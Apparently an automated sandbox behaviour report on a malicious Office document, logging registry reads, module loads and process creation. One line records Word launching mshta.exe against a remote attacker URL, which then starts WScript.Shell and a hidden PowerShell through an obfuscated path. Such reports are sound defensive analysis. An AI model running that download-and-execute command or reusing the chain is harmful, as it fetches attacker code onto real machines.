| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | value_name = Print_Background |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe | show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\System32\mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | comctl32.dll | base_address = 0x7fefc060000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | OLEACC.DLL | base_address = 0x7fef22f0000 |
|
1 | |
| Load | ieframe.dll | base_address = 0x7fef2350000 |
|
2 | |
| Load | ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x7fefe850000 |
|
1 | |
| Load | oleaut32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | WININET.dll | base_address = 0x7feff5e0000 |
|
1 | |
| Get Handle | c:\windows\system32\mshta.exe | base_address = 0xff9d0000 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x776e0000 |
|
3 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x7feff8e0000 |
|
1 | |
| Get Handle | EXPLORER.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | IEXPLORE.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Get Handle | mscoree.dll | base_address = 0x0 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
4 | |
| Get Filename | C:\Windows\System32\mshtml.dll | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| Get Filename | c:\windows\system32\mshta.exe | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Get Filename | IEXPLORE.EXE | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x776fc4a0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventWrite, address_out = 0x7782b510 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventRegister, address_out = 0x7783cac0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventUnregister, address_out = 0x77823c80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RegisterApplicationRestart, address_out = 0x7775f510 |
|
1 | |
| Get Address | c:\windows\system32\mshtml.dll | function = RunHTMLApplication, address_out = 0x7fee0ad5b90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSRWLock, address_out = 0x778384f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x77828020 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockShared, address_out = 0x778254e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77828050 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockShared, address_out = 0x778254b0 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 6, address_out = 0x7fefde71320 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 7, address_out = 0x7fefde71020 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 8, address_out = 0x7fefde713f0 |
|
1 | |
| Get Address | c:\windows\system32\oleacc.dll | function = LresultFromObject, address_out = 0x7fef22f3aa8 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x7fefe1e7490 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 2, address_out = 0x7fefde73480 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x7fefe1da4c4 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetClassObject, address_out = 0x7fefe1f2e18 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteExW, address_out = 0x7fefe877c70 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = VariantClear, address_out = 0x7fefde71180 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetUnlockRequestFile, address_out = 0x7feff5f70f4 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Map | - | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 3266448 |
|
1 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
2 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID |
|
2 | |
| Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
25 | |
| Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
25 | |
| Read | virtual_key_code = VK_MENU, result_out = 0 |
|
25 | |
| Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
15 | |
| Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
15 | |
| Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
15 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
7 | |
| Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 724, y_out = 422 |
|
5 | |
| Get Cursor | x_out = 631, y_out = 286 |
|
5 | |
| Get Cursor | x_out = 791, y_out = 286 |
|
5 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
4 | |
| Sleep | duration = -1 (infinite) |
|
7 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2017-10-24 17:37:59 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 127296 |
|
1 | |
| Get Time | type = Ticks, time = 127546 |
|
1 | |
| Get Time | type = Ticks, time = 131134 |
|
1 | |
| Get Time | type = Ticks, time = 131150 |
|
3 | |
| Get Time | type = Ticks, time = 131165 |
|
249 | |
| Get Time | type = Ticks, time = 131181 |
|
1 | |
| Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 131228 |
|
1 | |
| Get Time | type = Ticks, time = 131243 |
|
1 | |
| Get Time | type = Ticks, time = 131462 |
|
1 | |
| Get Time | type = Ticks, time = 147686 |
|
2 | |
| Get Time | type = Ticks, time = 147701 |
|
1 | |
| Get Time | type = Ticks, time = 147764 |
|
2 | |
| Get Info | type = Operating System |
|
7 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | - |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0x370 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
628
0x
9C8
0x
744
0x
7D8
0x
9EC
0x
96C
0x
970
0x
974
0x
990
0x
984
0x
73C
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3050F5C8-98B5-11CF-BB82-00AA00BDCE0B | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 50D5107A-D278-4871-8989-F4CEAAF59CFC | 08C0E040-62D1-11D1-9326-0060B067B86E | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | BB1A2AE1-A4F9-11CF-8F20-00805F2CD064 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | WsCriPt.SHeLl | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open Mapping | #MSHTML#PERF#00000370 | desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | value_name = Print_Background |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe | show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\System32\mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | comctl32.dll | base_address = 0x7fefc060000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | OLEACC.DLL | base_address = 0x7fef22f0000 |
|
1 | |
| Load | ieframe.dll | base_address = 0x7fef2350000 |
|
2 | |
| Load | mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x7fefe850000 |
|
1 | |
| Load | oleaut32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | WININET.dll | base_address = 0x7feff5e0000 |
|
1 | |
| Get Handle | c:\windows\system32\mshta.exe | base_address = 0xff9d0000 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x776e0000 |
|
3 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x7feff8e0000 |
|
1 | |
| Get Handle | EXPLORER.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | IEXPLORE.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Get Handle | mscoree.dll | base_address = 0x0 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
4 | |
| Get Filename | C:\Windows\System32\mshtml.dll | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| Get Filename | c:\windows\system32\mshta.exe | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Get Filename | IEXPLORE.EXE | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x776fc4a0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventWrite, address_out = 0x7782b510 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventRegister, address_out = 0x7783cac0 |
|
1 | |
